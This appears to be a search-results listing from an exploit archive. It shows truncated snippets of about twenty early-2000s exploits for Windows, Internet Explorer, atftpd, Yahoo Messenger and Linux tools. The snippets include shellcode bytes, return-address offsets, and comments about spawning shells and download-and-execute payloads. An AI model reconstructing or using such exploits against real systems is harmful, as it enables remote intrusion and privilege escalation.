7253 matches found
Microsoft Windows Media Services - Remote (MS03-022)
Microsoft Windows Media Services - Remote MS03-022 // Windows Media Services Remote Command Execution 2 // v. 1.0 beta // c firew0rker //tN The N0b0D1eS include include include ifdef WIN32 include pragma commentlib, "wsock32" else include include include include include include define SOCKET int...
PoC for Internet Explorer >=5.0 buffer overflow (trivial exploit for hard case).
Dear [email protected], Attached exploit for 1 works with 70 probability on Windows NT 4.0. I didn't test on different systems and it may differ; I don't care because I only wanted to show code execution IS possible. It works slowly and may require a few minutes to complete, see explanation...
DSR-korean-elm.pl
DSR-korean-elm.pl - kokaninATdtors.net vs. /usr/ports/korean/elm offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV reinventing the wheel, http://www.insecure.org/sploits/elm.curses.overflow.html shellcode by zillionATsafemode.org ko-elm-2.4h4.1 ELM Mail User Agent, patched for...
Yahoo Messenger 5.5 Remote Exploit (DSR-ducky.c)
Exploit for unknown platform in category remote exploits ================================================ Yahoo Messenger 5.5 Remote Exploit DSR-ducky.c ================================================ / --- Remote yahoo Messenger V5.5 exploiter on Windows XP --- Dtors Security Research DSR Code...
Yahoo Messenger 5.5 Remote Exploit (DSR-ducky.c)
No description provided by source. / --- Remote yahoo Messenger V5.5 exploiter on Windows XP --- Dtors Security Research DSR Code by: Rave The buffer looks like this |-----| Fillup x offsetJMP 0x3EIPNOPSSHELLCODE ^^ / include windows.h include stdio.h include stdlib.h include string.h include...
MS Windows WebDav II (New) Remote Root Exploit
Exploit for unknown platform in category remote exploits ============================================== MS Windows WebDav II New Remote Root Exploit ============================================== // / 29/05/2003 - by Alumni - / / Microsoft IIS WebDAV New Exploit / / spawns shell on port 32768 / /...
Atftpd 0.6 Remote Root Exploit (atftpdx.c)
Exploit for linux platform in category remote exploits ========================================== Atftpd 0.6 Remote Root Exploit atftpdx.c ========================================== / PoC linux/86 remote exploit against atftpd c gunzip FIXED / include include include include include include inclu...
Atftpd 0.6 - 'atftpdx.c' Remote Command Execution
/ PoC linux/86 remote exploit against atftpd c gunzip FIXED / include include include include include include include include include include define HEAPSTART 0x080514b4 define HEAPEND 0x080594b4 define BACKDOOR "rfe" / port MUST be 1024 / define NOPNUM 128 / number of nops / define PORT 69 / tft...
Atftpd 0.6 - atftpdx.c Remote Command Execution
Atftpd 0.6 - atftpdx.c Remote Command Execution / PoC linux/86 remote exploit against atftpd c gunzip FIXED / include include include include include include include include include include define HEAPSTART 0x080514b4 define HEAPEND 0x080594b4 define BACKDOOR "rfe" / port MUST be 1024 / define...
Mandrake Linux 8.2 - '/usr/mail' Local Overflow
!/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"...
Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)
Exploit for linux platform in category local exploits ======================================================= Mandrake Linux 8.2 /usr/mail local exploit d86mail.pl ======================================================= !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl...
Mandrake Linux 8.2 - usrmail Local Overflow
Mandrake Linux 8.2 - usrmail Local Overflow !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode =...
IE-object tag longtype exploit
!/usr/bin/perl =synopsis 06/06/03 - Proof of concept exploit by Sir Alumni [email protected] IE-Object longtype dynamic call overflow ... url://$shellcode'/'x48jmp ptrsh the flaw actually exists in URLMON.DLL when converting backslashes to wide char, this can be seen on stack dump near...
Microsoft Internet Explorer - Object Tag (MS03-020)
Microsoft Internet Explorer - Object Tag MS03-020 !/usr/bin/perl Proof of concept exploit on IE 5.x - 6.x by Alumni IE-Object longtype dynamic call overflow url:// the flaw actually exists in URLMON.DLL when converting backslashes to wide char, this can be seen on stack dump near...
Microsoft Internet Explorer - Object Tag (MS03-020)
!/usr/bin/perl Proof of concept exploit on IE 5.x - 6.x by Alumni IE-Object longtype dynamic call overflow url:// the flaw actually exists in URLMON.DLL when converting backslashes to wide char, this can be seen on stack dump near '&CLSID=AAA...2F2F...'. To exploit: i start server perl script; ii...
kon2 exploit!!
I looked at the kon2 source and the -Console arg is the problem, so here goes the PoC. ----cut here-------- !/usr/bin/perl Priv8security.com kon2 version 0.3.9b-16 and local root exploit. Tested on Redhat 8.0. should work on 9.0 and 7.3 Bug happens on -Coding arg. Based on Redhat Advisory. wsxz@localhost buffer...
xmame gain root exploit
/ --------------------------------------------------------------------------- Web: http://qb0x.net Author: Gabriel A. Maggiotti Date: March 31, 2003 E-mail: [email protected] --------------------------------------------------------------------------- / include stdio.h define OFFSET 1058 defi...
Batalla Naval 1.0 4 - Remote Buffer Overflow (1)
source: https://www.securityfocus.com/bid/7699/info Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server. !/usr/bin/perl Priv8security.com remote...
Maelstrom Server 3.0.x - Argument Buffer Overflow (2)
// source: https://www.securityfocus.com/bid/7630/info Maelstrom for Linux has been reported prone to a buffer overflow vulnerability. The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be...
Microsoft Windows XP - 'explorer.exe' Local Buffer Overflow
include include include include include char shellcode= //download url and exec shellcode //doesn't have any hardcoded values //except the base address of the program //searches the import table for //LoadLibraryA, GetProcAddress and ExitProcess. //by .einstein., dH team...